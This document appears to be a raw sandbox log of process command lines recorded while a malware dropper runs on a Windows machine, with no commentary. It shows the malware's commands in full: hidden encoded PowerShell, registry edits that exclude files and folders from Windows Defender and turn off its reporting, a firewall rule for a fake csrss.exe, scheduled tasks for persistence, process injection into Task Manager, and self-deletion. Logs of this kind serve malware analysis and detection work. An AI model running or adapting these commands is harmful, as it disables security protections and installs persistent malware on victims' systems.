C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\AppData\Local\Temp\7zSBEFA.tmp\Install.exe

.\Install.exe

C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe

"C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe"

C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe

"C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe"

C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe

"C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe

.\Install.exe /YnGgdidyhQpz "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gOEzsPtTT" /SC once /ST 10:56:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gOEzsPtTT"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x3f0040,0x3f004c,0x3f0058

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 856 -ip 856

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 2732

C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe

"C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gDKGtXeHw"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\kzkUUCH.exe\" id /pNsite_idAWZ 385118 /S" /V1 /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gOEzsPtTT"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe\" id /WZsite_idxpt 385118 /S" /V1 /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe id /WZsite_idxpt 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64

